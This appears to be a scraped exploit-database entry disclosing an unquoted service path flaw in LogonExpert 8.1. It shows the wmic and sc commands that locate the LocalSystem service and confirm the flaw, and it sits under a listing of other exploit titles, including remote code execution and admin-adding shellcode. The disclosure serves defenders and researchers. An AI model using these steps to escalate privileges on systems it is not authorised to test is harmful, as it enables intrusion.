
8 changes to exploits/shellcodes SpotAuditor 5.3.5 - 'multiple' Denial Of Service (PoC) Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC) LogonExpert 8.1 - 'LogonExpertSvc' Unquoted Service Path Softros LAN Messenger 9.6.4 - 'SoftrosSpellChecker' Unquoted Service Path python jsonpickle 2.0.0 - Remote Code Execution Unified Remote 3.9.0.2463 - Remote Code Execution LayerBB 1.1.4 - 'search_query' SQL Injection Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)
28 lines
No EOL
1.2 KiB
Text
28 lines
No EOL
1.2 KiB
Text
# Exploit Title: LogonExpert 8.1 - 'LogonExpertSvc' Unquoted Service Path
|
|
# Discovery by: Victor Mondragón
|
|
# Discovery Date: 23-02-2021
|
|
# Vendor Homepage: https://www.softros.com/
|
|
# Software Links : https://download.logonexpert.com/LogonExpertSetup64.msi
|
|
# Tested Version: 8.1
|
|
# Vulnerability Type: Unquoted Service Path
|
|
# Tested on: Windows 7 Service Pack 1 x64
|
|
# Step to discover Unquoted Service Path:
|
|
|
|
|
|
C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
|
|
LogonExpert Service LogonExpertSvc C:\Program Files\Softros Systems\LogonExpert\LogonExpertService.exe Auto
|
|
|
|
|
|
C:\>sc qc LogonExpertSvc
|
|
[SC] QueryServiceConfig SUCCESS
|
|
|
|
SERVICE_NAME: LogonExpertSvc
|
|
TYPE : 10 WIN32_OWN_PROCESS
|
|
START_TYPE : 2 AUTO_START
|
|
ERROR_CONTROL : 1 NORMAL
|
|
BINARY_PATH_NAME : C:\Program Files\Softros Systems\LogonExpert\LogonExpertService.exe
|
|
LOAD_ORDER_GROUP : LogonExpertGroup
|
|
TAG : 0
|
|
DISPLAY_NAME : LogonExpert Service
|
|
DEPENDENCIES :
|
|
SERVICE_START_NAME : LocalSystem |